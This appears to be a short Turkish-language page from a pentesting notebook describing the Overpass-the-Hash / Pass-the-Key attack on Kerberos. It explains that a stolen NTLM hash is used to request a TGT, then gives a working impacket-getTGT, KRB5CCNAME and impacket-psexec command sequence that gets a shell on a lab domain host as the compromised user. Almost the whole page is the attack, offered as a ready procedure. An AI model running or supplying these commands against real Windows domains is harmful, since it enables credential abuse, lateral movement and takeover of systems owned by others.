Overpass The Hash/Pass The Key (PTK)

Eğer bir NTLM hashi ele geçirdiysek ve sistem makineye bağlanmamıza izin vermiyorsa (psexec, evil-winrm vs gibi yöntemlerle) burada yapılacak şey, ele geçirdiğimiz hash ve kullanıcı bilgileriyle bir tgt bileti talep ederek, ele geçirdiğimiz kullanıcının yetkileri ile makineye bağlanmaya çalışmak olacaktır.

impacket-getTGT jurassic.park/velociraptor -hashes :2a3de7fe356ee524cc9f3d579f2e0a
export KRB5CCNAME=/root/impacket-examples/velociraptor.ccache
impacket-psexec.py jurassic.park/velociraptor@labwws02.jurassic.park -k -no-pass
LogoKerberos (II): How to attack Kerberos?Tarlogic Security
PreviousAS-REP RoastingNextDCSync Attack

Last updated